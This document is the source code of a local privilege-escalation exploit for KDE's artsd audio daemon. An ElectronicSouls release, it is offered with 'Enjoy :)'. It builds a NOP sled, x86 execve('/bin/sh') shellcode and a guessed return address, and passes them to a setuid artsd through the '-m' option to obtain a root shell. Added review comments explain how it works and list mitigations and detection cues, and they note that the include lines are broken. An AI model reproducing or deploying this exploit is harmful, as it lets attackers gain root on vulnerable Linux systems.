This is the local buffer oveflow exploit for KDE's artsd application. Enjoy :)
-------------------------------------------------
/*
 * 0x4553artsd.c [ElectronicSouls]
 * KDE 2.x/3.x artsd Local Exploit
 * By: BuRn-X & 0x90 0x90
 * "The louder the music the better the code!"
 * Note: artsd must be +s to work
 * "Save a bug, save a life!"
 * http://www.electronicsouls.org
 */

/*
 * NOTE(review): what this listing shows, read from the code below.
 *
 * - The program builds one oversized string and hands it to
 *   /opt/kde/bin/artsd as the value of the "-m" option. The overflow itself
 *   is presumably in artsd's handling of that argument; artsd's code is not
 *   on this page, so that part is inferred, not shown.
 * - The author's own note ("artsd must be +s") states the precondition:
 *   privileges are only gained when artsd is installed setuid. Clearing the
 *   setuid bit on artsd, or running a fixed artsd, removes that gain.
 * - The overwrite value is a guess derived from this process's own stack
 *   pointer, and the payload is placed in the argument string. That approach
 *   presumes predictable stack addresses and an executable stack; stack
 *   address randomisation and a non-executable stack each undermine it.
 * - Detection angle: exec auditing that records argv will show a
 *   multi-kilobyte "-m" value made of 0x90 bytes and ending near "/bin/sh"
 *   being passed to a setuid binary.
 */

/* The header names of these three directives were lost when the page was
 * extracted; they are left exactly as found, so the listing does not compile
 * as shown. */
#include
#include
#include

/* Default total length of the argument string; overridable via argv[1]. */
#define BSIZE 4000
/* Extra bytes left between the payload and the trailing address words. */
#define ALIGN 0
/* Amount subtracted from the sampled stack pointer to form the address guess. */
#define OFFSET 0

/*
 * Position-independent payload for 32-bit x86 Linux: the "\xcd\x80" pairs are
 * `int $0x80` system calls and the string ends in the path "/bin/sh".
 * It looks like the common execve("/bin/sh") stub followed by an exit call
 * (al = 0x0b, then al = 0x01) -- confirm by disassembly before relying on it.
 * The bytes before "/bin/sh" contain no 0x00, so strlen() below measures the
 * whole array.
 */
unsigned char esshellcode[] =
    "\xeb\x16\x31\xdb\x31\xc9\xf7\xe1"
    "\x5b\xb0\x0b\x88\x53\x07\x52\x53"
    "\x89\xe1\xcd\x80\xb0\x01\xcd\x80"
    "\xe8\xe5\xff\xff\xff/bin/sh";

/*
 * Samples the current stack pointer.
 *
 * The function has no return statement: it relies on the inline asm leaving
 * the value in %eax, which is where the i386 calling convention returns an
 * integer. That is undefined behaviour in C and is specific to 32-bit x86
 * (`movl`, %esp, %eax); an optimising compiler is free to break it.
 */
unsigned long get_sp(void)
{
    __asm__("movl %esp, %eax");
}

/*
 * Builds the argument string and replaces this process with artsd.
 *
 * argv[1], when given, overrides the string length (BSIZE). Returns 0 only
 * if execl() fails, since a successful execl() does not return.
 */
int main(int argc, char **argv)
{
    char *buffer;
    int i;              /* unused */
    int bsize = BSIZE;
    int align = ALIGN;
    int offset = OFFSET;
    unsigned long addr;

    /* atoi() reports no errors, and the result is not range-checked: a value
     * smaller than 8 + align + strlen(esshellcode) makes the index arithmetic
     * below land outside the allocation. */
    if(argc > 1) bsize = atoi(argv[1]);

    /* malloc() result is used without a NULL check. */
    buffer = (char *)malloc(bsize);

    /* The bzero() is immediately overwritten: every byte becomes 0x90, the
     * one-byte x86 NOP, forming the filler in front of the payload. */
    bzero(buffer, bsize);
    memset(buffer, 0x90, bsize);

    /* Address guess: this process's stack pointer minus OFFSET, used as a
     * stand-in for a stack address inside the target process. */
    addr = get_sp() - offset;

    /* The guess is stored twice, in the last 8 bytes of the buffer. The
     * bsize-4 / bsize-8 spacing assumes a 4-byte unsigned long; where
     * unsigned long is 8 bytes the first store runs 4 bytes past the end of
     * the allocation. The casts also assume the offsets are suitably aligned. */
    *(unsigned long *)&buffer[bsize - 4] = addr;
    *(unsigned long *)&buffer[bsize - 8] = addr;

    /* Payload is copied so that it ends `align` bytes before the two address
     * words; everything in front of it stays 0x90 filler. */
    memcpy(buffer + bsize - 8 - align - strlen (esshellcode), esshellcode, strlen(esshellcode));

    /* Hard-coded install path; the crafted string is the value of "-m". */
    execl ("/opt/kde/bin/artsd", "artsd", "-m", buffer, NULL);

    /* Reached only when execl() failed (e.g. no binary at that path). */
    return 0;
}
------------------------------------------------
Get your own Free ES E-mail account at : Http://electronicsouls.zzn.com